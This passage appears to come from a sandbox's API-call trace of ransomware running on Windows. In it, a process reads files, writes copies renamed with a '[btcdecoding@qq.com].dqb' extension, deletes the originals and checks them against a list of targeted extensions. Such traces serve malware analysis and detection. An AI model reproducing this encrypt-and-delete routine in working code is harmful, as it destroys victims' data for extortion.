returned 0xffffffff [0036.179] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.179] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.179] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.179] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.180] GetLastError () returned 0x0 [0036.180] ReadFile (in: hFile=0x1a4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x5061, lpOverlapped=0x0) returned 1 [0036.181] WriteFile (in: hFile=0x180, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x5070, lpOverlapped=0x0) returned 1 [0036.183] ReadFile (in: hFile=0x1a4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.183] WriteFile (in: hFile=0x180, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.183] SetEndOfFile (hFile=0x180) returned 1 [0036.183] CloseHandle (hObject=0x180) returned 1 [0036.184] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.184] SetEndOfFile (hFile=0x1a4) returned 1 [0036.185] CloseHandle (hObject=0x1a4) returned 1 [0036.185] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0036.185] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0036.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.185] lstrlenW (lpString=".doc") returned 4 [0036.185] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.185] lstrlenW (lpString=".docx") returned 5 [0036.185] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.185] lstrlenW (lpString=".pdf") returned 4 [0036.185] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.186] lstrlenW (lpString=".xls") returned 4 [0036.186] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.186] lstrlenW (lpString=".xlsx") returned 5 [0036.186] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.186] lstrlenW (lpString=".ppt") returned 4 [0036.186] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.186] lstrlenW (lpString=".zip") returned 4 [0036.186] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.186] lstrlenW (lpString=".rar") returned 4 [0036.186] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.186] lstrlenW (lpString=".bz2") returned 4 [0036.186] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.186] lstrlenW (lpString=".7z") returned 3 [0036.186] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.186] lstrlenW (lpString=".dbf") returned 4 [0036.186] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.186] lstrlenW (lpString=".1cd") returned 4 [0036.186] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.186] lstrlenW (lpString=".jpg") returned 4 [0036.186] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.186] lstrlenW (lpString=".doc") returned 4 [0036.186] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.186] lstrlenW (lpString=".docx") returned 5 [0036.186] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.186] lstrlenW (lpString=".pdf") returned 4 [0036.186] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.186] lstrlenW (lpString=".xls") returned 4 [0036.186] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.186] lstrlenW (lpString=".xlsx") returned 5 [0036.186] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.186] lstrlenW (lpString=".ppt") returned 4 [0036.186] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.187] lstrlenW (lpString=".zip") returned 4 [0036.187] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.187] lstrlenW (lpString=".rar") returned 4 [0036.187] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.187] lstrlenW (lpString=".bz2") returned 4 [0036.187] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.187] lstrlenW (lpString=".7z") returned 3 [0036.187] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.187] lstrlenW (lpString=".dbf") returned 4 [0036.187] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.187] lstrlenW (lpString=".1cd") returned 4 [0036.187] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.187] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.187] lstrlenW (lpString=".jpg") returned 4 [0036.187] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.187] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0036.187] lstrlenW (lpString="VisiorWW.xml") returned 12 [0036.187] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.188] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=8723) returned 1 [0036.188] CloseHandle (hObject=0x1a4) returned 1 [0036.188] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 0x2020 [0036.188] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.188] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.188] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.188] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.188] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.189] GetLastError () returned 0x0 [0036.189] ReadFile (in: hFile=0x1a4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x2213, lpOverlapped=0x0) returned 1 [0036.190] WriteFile (in: hFile=0x180, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x2220, lpOverlapped=0x0) returned 1 [0036.191] ReadFile (in: hFile=0x1a4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.191] WriteFile (in: hFile=0x180, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0036.191] SetEndOfFile (hFile=0x180) returned 1 [0036.191] CloseHandle (hObject=0x180) returned 1 [0036.192] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.192] SetEndOfFile (hFile=0x1a4) returned 1 [0036.193] CloseHandle (hObject=0x1a4) returned 1 [0036.193] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0036.193] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 1 [0036.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.193] lstrlenW (lpString=".doc") returned 4 [0036.193] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.194] lstrlenW (lpString=".docx") returned 5 [0036.194] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.194] lstrlenW (lpString=".pdf") returned 4 [0036.194] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.194] lstrlenW (lpString=".xls") returned 4 [0036.194] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.194] lstrlenW (lpString=".xlsx") returned 5 [0036.194] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.194] lstrlenW (lpString=".ppt") returned 4 [0036.194] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.194] lstrlenW (lpString=".zip") returned 4 [0036.194] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.194] lstrlenW (lpString=".rar") returned 4 [0036.194] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.194] lstrlenW (lpString=".bz2") returned 4 [0036.194] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.194] lstrlenW (lpString=".7z") returned 3 [0036.194] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.194] lstrlenW (lpString=".dbf") returned 4 [0036.194] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.194] lstrlenW (lpString=".1cd") returned 4 [0036.194] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.194] lstrlenW (lpString=".jpg") returned 4 [0036.194] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.194] lstrlenW (lpString=".doc") returned 4 [0036.194] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.194] lstrlenW (lpString=".docx") returned 5 [0036.194] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.194] lstrlenW (lpString=".pdf") returned 4 [0036.194] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.194] lstrlenW (lpString=".xls") returned 4 [0036.195] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.195] lstrlenW (lpString=".xlsx") returned 5 [0036.195] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.195] lstrlenW (lpString=".ppt") returned 4 [0036.195] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.195] lstrlenW (lpString=".zip") returned 4 [0036.195] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.195] lstrlenW (lpString=".rar") returned 4 [0036.195] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.195] lstrlenW (lpString=".bz2") returned 4 [0036.195] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.195] lstrlenW (lpString=".7z") returned 3 [0036.195] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.195] lstrlenW (lpString=".dbf") returned 4 [0036.195] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.195] lstrlenW (lpString=".1cd") returned 4 [0036.195] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.195] lstrlenW (lpString=".jpg") returned 4 [0036.195] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.195] lstrcmpiW (lpString1=".EPS", lpString2=".dqb") returned 1 [0036.195] lstrlenW (lpString="MS.EPS") returned 6 [0036.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.197] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=15067) returned 1 [0036.197] CloseHandle (hObject=0x1a4) returned 1 [0036.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 0x20 [0036.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.197] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.197] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.198] GetLastError () returned 0x0 [0036.198] ReadFile (in: hFile=0x1a4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x3adb, lpOverlapped=0x0) returned 1 [0036.199] WriteFile (in: hFile=0x180, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x3ae0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x3ae0, lpOverlapped=0x0) returned 1 [0036.200] ReadFile (in: hFile=0x1a4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.200] WriteFile (in: hFile=0x180, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0036.201] SetEndOfFile (hFile=0x180) returned 1 [0036.201] CloseHandle (hObject=0x180) returned 1 [0036.201] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.201] SetEndOfFile (hFile=0x1a4) returned 1 [0036.202] CloseHandle (hObject=0x1a4) returned 1 [0036.202] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0036.202] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 1 [0036.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.203] lstrlenW (lpString=".doc") returned 4 [0036.203] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1 [0036.203] lstrlenW (lpString=".docx") returned 5 [0036.203] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1 [0036.203] lstrlenW (lpString=".pdf") returned 4 [0036.203] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1 [0036.203] lstrlenW (lpString=".xls") returned 4 [0036.203] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1 [0036.203] lstrlenW (lpString=".xlsx") returned 5 [0036.203] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1 [0036.203] lstrlenW (lpString=".ppt") returned 4 [0036.203] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1 [0036.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.203] lstrlenW (lpString=".zip") returned 4 [0036.203] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1 [0036.203] lstrlenW (lpString=".rar") returned 4 [0036.203] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1 [0036.203] lstrlenW (lpString=".bz2") returned 4 [0036.203] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1 [0036.203] lstrlenW (lpString=".7z") returned 3 [0036.203] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1 [0036.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.203] lstrlenW (lpString=".dbf") returned 4 [0036.203] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1 [0036.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.203] lstrlenW (lpString=".1cd") returned 4 [0036.203] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1 [0036.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.203] lstrlenW (lpString=".jpg") returned 4 [0036.203] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1 [0036.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.204] lstrlenW (lpString=".doc") returned 4 [0036.204] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1 [0036.204] lstrlenW (lpString=".docx") returned 5 [0036.204] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1 [0036.204] lstrlenW (lpString=".pdf") returned 4 [0036.204] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1 [0036.204] lstrlenW (lpString=".xls") returned 4 [0036.204] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1 [0036.204] lstrlenW (lpString=".xlsx") returned 5 [0036.204] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1 [0036.204] lstrlenW (lpString=".ppt") returned 4 [0036.204] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1 [0036.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.204] lstrlenW (lpString=".zip") returned 4 [0036.204] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1 [0036.204] lstrlenW (lpString=".rar") returned 4 [0036.204] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1 [0036.204] lstrlenW (lpString=".bz2") returned 4 [0036.204] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1 [0036.204] lstrlenW (lpString=".7z") returned 3 [0036.204] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1 [0036.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.204] lstrlenW (lpString=".dbf") returned 4 [0036.204] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1 [0036.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.204] lstrlenW (lpString=".1cd") returned 4 [0036.204] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1 [0036.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.204] lstrlenW (lpString=".jpg") returned 4 [0036.204] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1 [0036.205] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0036.205] lstrlenW (lpString="MS.GIF") returned 6 [0036.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.205] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=1069) returned 1 [0036.205] CloseHandle (hObject=0x1a4) returned 1 [0036.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 0x20 [0036.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, 